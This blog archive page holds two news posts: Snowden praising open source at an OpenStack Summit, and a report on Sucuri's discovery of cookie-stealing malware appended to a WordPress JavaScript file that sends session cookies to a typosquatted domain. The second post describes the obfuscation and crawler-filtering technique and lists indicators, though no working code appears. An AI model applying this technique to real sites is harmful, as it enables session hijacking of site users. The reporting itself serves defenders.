Daily Archives: May 12, 2017

Why Edward Snowden loves open source

Published by:

Infamous government hacker Edward Snowden believes open source is a fundamentally better way to use technology compared to proprietary technology that he believes disempowers users.

Snowden was interviewed in the open source cloud computing project OpenStack Summit in Boston via video from a non-descript location and spoke about his personal use of open source technology. In 2013 Snowden, then a government contractor, leaked classified information about government surveillance programs run by the National Security Agency, which brought him worldwide fame.

Speaking specifically about cloud computing technology, Snowden said clouds from Amazon and Google are fine, but noted that customers using these products are “sinking costs into an infrastructure that is not yours… you’re investing into things you don’t control or shape.” Snowden raised the question: “When you’re running things in Google’s cloud, Amazon’s cloud, how do you know when you’re being spied on?” Whether its happening legally or illegally, Snowden argues these vendors could use customers’ informant’sn “at a layer that’s hidden from you.” There have been no credible reports of cloud vendors spying on customers.

Snowden encouraged attendees of the OpenStack Summit to “direct the future of the internet in a more free and fair way.” One way to do that, he says, is to use open source tools to build computing platforms that customers build and host themselves, which gives users more control over how data is handled.

Amazon Web Services explains on the Data Privacy section of its website that customers control their own data. “Customers maintain ownership of their customer content and select which AWS services process, store and host their customer content. We do not access or use customer content for any purpose other than as legally required and for maintaining the AWS services and providing them to our customers and their end users,” the site states. “We never use customer content or derive information from it for marketing or advertising.” Cloud vendors also offer a variety of ways that customers can encrypt data stored in the public cloud, including offering customers the ability to hold their own keys to the encryption.

Snowden is also worried about data privacy when it comes to smartphones and other technologies. “All systems should be designed to obey the user, they should not deceive or lie to the user. They shouldn’t hide from the user,” he said. Snowden said he’s working on open source code projects that allow users to verify the status of their phones, for example, to ensure that when WiFi or networking features are disabled that they truly are.

Snowden said he used a variety of open source tools to facilitate his 2013 leaking of thousands of classified government documents, including the Debian open source operating system and the Tor Project, which helps protect users anonymity.

SESSION HIJACKING, COOKIE-STEALING WORDPRESS MALWARE SPOTTED

Published by:

Researchers have identified a strain of cookie stealing malware injected into a legitimate JavaScript file, that masquerades as a WordPress core domain.

Cesar Anjos, a security analyst at Sucuri, a firm that specializes in WordPress security, came across the malware during an incident response investigation and described it in a blog post-Tuesday.

Anjos says it appears attackers used typosquatting, or URL hijacking, to craft the phony domain, code.wordprssapi[.]com. Typosquatting is a technique that usually relies on users making typographical errors when inputting URLs into a web browser. In this case, the fake site is designed to look like a legitimate WordPress domain so it doesn’t appear out of place in the code.

The researcher said it appeared attackers injected malware into the bottom of a legitimate WordPress JavaScript file designed to reroute sensitive information, such as cookies, to the fake domain.

Denis Sinegubko, a senior malware researcher at Sucuri, told Threatpost Wednesday that it’s likely an attacker took advantage of another vulnerability in WordPress to inject the obfuscated code in the first place.

“Modern attacks rarely use one specific vulnerability. They usually scan for multiple known vulnerabilities (mostly in third-party themes and plugins) and then exploit whatever they find,” Sinegubko said.

Anjos points out that in addition to appearing at the bottom of an actual WordPress JavaScript file – wp-includes/js/hoverIntent[.]min[.]js – the code also uses a typical obfuscation pattern, eval(function(p,a,c,k,e,d). The function, commonly used in JavaScript libraries and scripts, tightly packs code that’s later executed when the page loads.

After Anjos decoded the obfuscated code, he saw the malicious – and now offline – WordPress API site.

In this case, Anjos says a conditional statement hidden at the top of the code excludes cookies from user agents from search engine crawlers. That “extra mile” by the attacker, Anjos says, helps weeds out cookie information from crawlers and bots and “ensures that the data being sent to attackers is more likely to immediately be usable.”

Once it’s been determined the data – in this case, a users’ cookies – are valuable, a script sends it to the malicious site (code.wordprssapi[.]com) so it can be siphoned up and used by attackers, Anjos says.

By stealing a user’s cookies, through what’s essentially a session hijacking attack, an attacker can pretend to be that user and perform any actions the user has permission to perform. At least until those permissions are revoked; something that’s done after a period of inactivity for many types of online accounts, including WordPress.

The site that URL is mimicking, code.wordpressapi[.]com, isn’t even a legitimate site, the researcher points out. But in this case, that doesn’t matter; the fact that it includes the word “WordPress” is enough to make it look like it belongs, Anjos says; that’s what tricks users.

“By purchasing a domain closely resembling a legitimate website platform or service, some webmasters might overlook this in their code and assume it is an official WordPress domain (which it is not),” Anjos wrote.

Sinegubko is a bit puzzled when it comes to who may have been to the malicious site.

“No clue,” Sinegubko said when asked Wednesday, “As always, WHOIS data is ‘privacy protected,’ the IP (45.32.137.126) points to vultr[.]com network (not a typical choice for hackers especially with the Windows IIS/8.5 server).”

In addition to ensuring they have clean code, webmasters should double check sites to ensure they’re not sending sensitive data, like cookies or passwords, to a third party, Anjos says.

“This is something that all webmasters should be aware of when they are auditing their own code. Be careful and always check that a domain is legitimate, especially if it is involved in collecting or sending information to a third-party site,” the researcher wrote.